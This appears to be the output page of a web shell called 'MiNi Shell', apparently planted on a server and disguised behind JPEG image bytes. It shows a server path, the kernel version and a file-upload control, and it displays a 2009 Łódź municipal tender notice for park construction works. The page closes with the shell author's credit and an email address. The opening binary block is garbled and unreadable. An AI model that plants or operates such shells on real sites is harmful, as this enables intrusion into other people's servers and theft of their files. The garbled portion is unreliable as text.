JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090928/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090928/164729-N-2009.html

<p class="kh_header"><b>Łódź: Zagospodarowanie części Parku im. St. Staszica w Łodzi - etap I</b><br>
<b>Numer ogłoszenia: 164729 - 2009; data zamieszczenia: 28.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Łodzi Wydział Ochrony Środowiska i Rolnictwa , ul. Tymienieckiego 5, 90-365 Łódź, woj. łódzkie, tel. 042 6384711, faks 042 6384747.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uml.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zagospodarowanie części Parku im. St. Staszica w Łodzi - etap I.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest I etap zagospodarowania terenu działki zlokalizowanej przy ulicy Wierzbowej 41/43 w Łodzi, o numerze ewidencyjnym 228/8, obręb S - 02, stanowiącej część Parku im. St. Staszica.

1. Zakres rzeczowy przedmiotu zamówienia obejmuje:
roboty przygotowawcze: uprawy wstępne wraz z zebraniem zanieczyszczeń i kamieni na powierzchni- 0,246 ha, remont ścian pozostałych po wyburzeniu budynków oraz ogrodzenia w granicy posesji od strony południowej, o łącznej długości -30,50 m, budowę alejki o nawierzchni z kostki granitowej o powierzchni- 244,00 m2 wraz z rozebraniem i przebudową wjazdów, budowę alejki o nawierzchni z kostki granitowej o powierzchni - 73,60 m2. Szczegółowy opis robót budowlanych zawarty jest w: Projekcie budowlanym i wykonawczym zagospodarowania części Parku im. St. Staszica w Łodzi, wykonanym przez Projektowanie Architektoniczne Grażyna Ulisiak, z siedzibą w Łodzi, Specyfikacji technicznej wykonania i odbioru robót budowlanych, Przedmiarze robót. Wykonawca dostarczy wszystkie materiały i sprzęt niezbędny do wykonania przedmiotu zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.61-5, 45.11.27.11-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 3 000.00 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. W przetargu mogą wziąć udział Wykonawcy, którzy spełniają następujące warunki: a. posiadają uprawnienia do wykonywania działalności gospodarczej; b. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, c. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, d. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust.1 i 2 ustawy. 2. Za spełnianie warunków, określonych w ppkt a - c, Zamawiający uzna:
ad. a. warunek ten spełnią wykonawcy, którzy prowadzą działalność gospodarczą; ad. b. warunek ten spełnią wykonawcy, którzy w okresie ostatnich 5 lat
(przed dniem wszczęcia postępowania o udzielenie zamówienia) 
zrealizowali należycie roboty budowlane odpowiadające swoim rodzajem i wartością robotom budowlanym, stanowiącym przedmiot zamówienia, tj.: 
- wykonanie nawierzchni z kostki granitowej lub betonowej: robót o wartości co najmniej 100 000 zł brutto łącznie za maksimum 2 roboty - z podaniem wartości, ilości robót, dat i miejsca wykonania;
jeżeli okres prowadzenia działalności jest krótszy, należy udokumentować posiadane doświadczenie wynikające z prowadzonych prac o ww. wartości i ilości w okresie prowadzonej działalności;
oraz
- dysponują osobą posiadającą uprawnienia budowlane o specjalności: robót drogowych
ad. c. warunek ten spełnią wykonawcy, którzy posiadają polisę lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, na kwotę co najmniej 150 000 zł.
3. Za spełnianie warunku, określonego w ppkt d, Zamawiający uzna złożenie przez Wykonawcę oświadczenia o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne, o których mowa w art. 22 ust.1 ustawy (druk załączony do SIWZ) oraz oświadczeń i dokumentów wymienionych w punkcie VI niniejszej specyfikacji. Ocena spełnienia warunków udziału w postępowaniu będzie dokonywana na podstawie złożonych przez Wykonawcę oświadczeń i dokumentów, według kryterium: spełnia - nie spełnia.
4. Wykonawcy, którzy nie spełnią warunków wskazanych w ppkt. 1 lit. a - d, z uwzględnieniem art. 26 ust. 3 ustawy, zostaną wykluczeni 
z postępowania o udzielenie zamówienia. Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą.
5. Wykonawcy ubiegający się wspólnie o udzielenie niniejszego zamówienia muszą wykazać, że spełniają:
- łącznie wszyscy Wykonawcy: warunki określone w ppkt. 1 lit. b, c, na potwierdzenie których należy załączyć dokumenty i oświadczenia wymienione w pkt VI ppkt. 2-5 niniejszej specyfikacji;
- każdy z Wykonawców: warunki określone w ppkt 1 lit. a, d, na potwierdzenie których należy załączyć dokumenty wymienione w pkt. VI ppkt 1 niniejszej specyfikacji..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Do oferty należy załączyć oświadczenie Wykonawcy (Wykonawców ubiegających się wspólnie o udzielenie zamówienia) o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne, o których mowa w art. 22 ust.1 ustawy (druk załączony do SIWZ) oraz następujące oświadczenia i dokumenty:
1. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie 
o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (lub zaktualizowany przez organ wydający dokument) - w formie oryginału lub kserokopii poświadczonej przez Wykonawcę za zgodność z oryginałem;
2. Wykaz robót budowlanych zrealizowanych w okresie ostatnich 5 lat (przed dniem wszczęcia postępowania), odpowiadających swoim rodzajem i wartością robotom budowlanym, stanowiącym przedmiot zamówienia, tj. wykonanie nawierzchni z kostki granitowej lub betonowej: robót o wartości co najmniej 100 000 zł brutto łącznie za maksimum 2 roboty 
- z podaniem wartości, ilości robót, dat i miejsca wykonania; 
Jeżeli okres prowadzenia działalności jest krótszy, należy udokumentować posiadane doświadczenie wynikające z wykonanych prac o ww. wartości i ilości w okresie prowadzonej działalności;
3. Dokumenty potwierdzające, że roboty, o których mowa w ppkt. 2
(o wykazanej w wykazie wartości), zostały wykonane należycie. 
4. Wykaz osób odpowiedzialnych za realizację zamówienia 
z udokumentowaniem ich kwalifikacji, posiadanych uprawnień 
i odpowiednio członkostwa we właściwej izbie samorządu zawodowego:  
należy dysponować osobą z uprawnieniami budowlanymi w specjalności robót drogowych.
5. Polisę lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, na kwotę co najmniej 150 000 zł. 
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów wymienionych w ppkt. 1 składa odpowiednie dokumenty, wymienione w § 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87 poz. 605 z późn. zm.)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> bip.uml.lodz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Ochrony Środowiska i Rolnictwa Urzędu Miasta Łodzi
90-365  Łódź, ul.  Ks. Biskupa Wincentego Tymienieckiego 5
pok. 114.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.10.2009 godzina 10:00, miejsce: Wydział Ochrony Środowiska i Rolnictwa Urzędu Miasta Łodzi
90-365  Łódź, ul.  Ks. Biskupa Wincentego Tymienieckiego 5
pok. 117.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com